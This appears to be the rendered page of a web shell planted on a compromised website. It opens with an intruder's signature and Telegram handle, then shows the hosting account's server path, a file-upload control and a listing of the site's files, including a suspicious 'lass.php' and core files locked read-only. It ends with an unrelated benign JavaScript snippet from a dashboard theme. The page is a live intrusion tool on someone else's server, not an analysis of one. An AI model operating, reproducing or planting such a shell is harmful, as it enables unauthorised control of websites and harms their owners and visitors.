telegram : @iamdarkcomedy i am hacker

path :/home2/rdpgqqmy/public_html/techperformanceusa/public

upload file:

List of files:

name file size edit permission action
.htaccess906 KBJanuary 18 2024 20:05:520444
css-February 22 2025 03:07:500755
dashboard-February 21 2025 20:05:510755
error_log51354 KBFebruary 27 2025 15:17:580644
favicon.ico0 KBOctober 18 2021 11:56:120644
frontend-February 21 2025 20:05:510755
index.php6518 KBFebruary 21 2025 20:04:340444
index0.php1790 KBOctober 18 2021 11:56:120644
js-February 22 2025 03:23:490755
lass.php16962 KBFebruary 21 2025 20:04:340644
mix-manifest.json72 KBOctober 18 2021 17:53:080644
storage-February 22 2025 03:23:280755
uploads-February 22 2025 03:24:050755
web.config1211 KBOctober 18 2021 11:56:120644
"use strict"; // Class definition var KTProfile = function () { // Elements var avatar; var offcanvas; // Private functions var _initAside = function () { // Mobile offcanvas for mobile mode offcanvas = new KTOffcanvas('kt_profile_aside', { overlay: true, baseClass: 'offcanvas-mobile', //closeBy: 'kt_user_profile_aside_close', toggleBy: 'kt_subheader_mobile_toggle' }); } var _initForm = function() { avatar = new KTImageInput('kt_profile_avatar'); } return { // public functions init: function() { _initAside(); _initForm(); } }; }(); jQuery(document).ready(function() { KTProfile.init(); });